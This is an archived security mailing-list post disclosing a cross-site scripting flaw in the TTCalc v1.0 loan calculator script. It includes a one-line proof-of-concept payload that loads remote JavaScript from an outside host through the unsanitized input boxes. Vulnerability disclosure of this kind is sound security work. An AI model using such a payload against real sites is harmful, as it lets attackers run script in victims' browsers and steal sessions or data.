TigerTom Scripts

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: TigerTom Scripts
From: luny@youf**ktard.com
Date: 5 Jul 2006 19:44:15 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

TigerTom Scripts

Homepage:
http://www.ttfreeware.co.uk/

Affected files:
TTCalc script v1.0

---------------------------

Data pased in the "Length of loan, years" and "Length of mortgage, years" input 
boxes are not sanatized before being generated. 

For a PoC in the input boxes listed above simply put:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Prev by Date: vBulletin 3.5.4 (install_path) Exploit
Next by Date: [SECURITY] [DSA 1104-2] New OpenOffice.org packages fix arbitrary code execution
Previous by thread: RE: Re: vBulletin 3.5.4 (install_path) Exploit
Next by thread: [SECURITY] [DSA 1104-2] New OpenOffice.org packages fix arbitrary code execution
Index(es):
- Date
- Thread